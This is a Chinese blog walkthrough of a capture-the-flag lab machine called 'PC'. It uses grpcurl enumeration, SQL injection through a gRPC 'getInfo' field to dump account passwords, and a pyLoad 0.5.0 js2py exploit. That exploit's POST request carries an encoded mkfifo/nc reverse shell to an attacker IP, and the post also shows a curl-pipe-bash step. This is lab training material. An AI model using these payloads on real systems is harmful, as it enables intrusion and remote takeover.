[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升

2025-02-21 1 0

Information Gathering

IP Address Opening Ports
10.10.11.214 TCP:22,50051

$ ip='10.10.11.214'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 91bf44edea1e3224301f532cea71e5ef (RSA)
|   256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_  256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open  unknown

gRPC HTTP/2 SQLI

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图

https://github.com/fullstorydev/grpcurl/releases/latest/download/grpcurl_1.9.2_linux_x86_64.tar.gz

$ grpcurl -plaintext 10.10.11.214:50051 list

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图1

$ grpcurl -plaintext 10.10.11.214:50051 list SimpleApp

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图2

$ grpcurl -plaintext 10.10.11.214:50051 describe SimpleApp

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图3

$ grpcurl -plaintext 10.10.11.214:50051 describe LoginUserRequest

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图4

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图5

$ grpcurl -plaintext 10.10.11.214:50051 describe getInfoRequest
请求参数

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图6

注册用户

$ grpcurl -plaintext -d '{"username":"maps","password":"maps"}' 10.10.11.214:50051 SimpleApp.RegisterUser

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图7

$ grpcurl -plaintext -vv -d '{"username":"maps","password":"maps"}' 10.10.11.214:50051 SimpleApp.LoginUser

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图8

token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibWFwcyIsImV4cCI6MTczOTg2MzQyOX0.CHbQPJZifCuzIQ7IzTJlN8BYd9T4SStEwEL4ygJpygM'

$ grpcurl -plaintext -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibWFwcyIsImV4cCI6MTczOTg2MzQyOX0.CHbQPJZifCuzIQ7IzTJlN8BYd9T4SStEwEL4ygJpygM' -d '{"id": "-1 union select 2-- -"}' 10.10.11.214:50051 SimpleApp.getInfo

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图9

$ grpcurl -plaintext -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibWFwcyIsImV4cCI6MTczOTg5NTYyNn0.ad2gHY5jP89gKHHTwRndAV_vC3nLAW48qNNGBs5SSxY' -d '{"id": "-1 UNION SELECT GROUP_CONCAT(username || password) FROM accounts;--"}' 10.10.11.214:50051 SimpleApp.getInfo

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图10

HereIsYourPassWord1431

$ ssh sau@10.10.11.214

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图11

User.txt

853046f61d1950319e09a0664f03abc6

Privilege Escalation:pyLoad 0.5.0 js2py Abuse

https://github.com/MartinxMax/KTOR/blob/main/ktor.sh

$ curl http://10.10.16.24/ktor.sh|bash -s -- -l -p all

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图12

$ ssh -f -N -L 8000:127.0.0.1:8000 -L 9666:127.0.0.1:9666 sau@10.10.11.214

http://127.0.0.1:8000/login?next=http%3A%2F%2F127.0.0.1%3A8000%2F

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图13

$ ps aux | grep pyload

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图14

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图15

https://huntr.com/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65

$ curl -i -s -k -X POST \
--data-binary "jk=pyimport%20os;os.system(\"rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.16.24%201234%20%3E%2Ftmp%2Ff\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa" \
"http://localhost:8000/flash/addcrypted2"

[Meachines] [Easy] PC gRPC HTTP2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升插图16

Root.txt

6c032585f46aad66f4762f8f95e59fe1

相关文章:

  1. [Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升
  2. [Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…
  3. [Meachines] [Medium] Popcorn SQLI+Upload File+PAM…
  4. [Meachines] [Insane] Bankrobber XSS-MDOG+SQLI+XSRF…
  5. [Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

4A测评
网络安全
0 0

相关文章

x64环境下完全隐藏导入表技术全解析
[Meachines] [Easy] Wifinetic FTP匿名登录+Reaver WPS PIN密码泄露权限提升
[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升
网络钓鱼即服务平台 Darcula 现已支持自动生成针对任何品牌的钓鱼工具包
如何依据GDPR起诉公司数据滥用与隐私侵犯行为
警惕!利用AI深度伪造视频的新型“自骗”攻击浪潮来袭

发布评论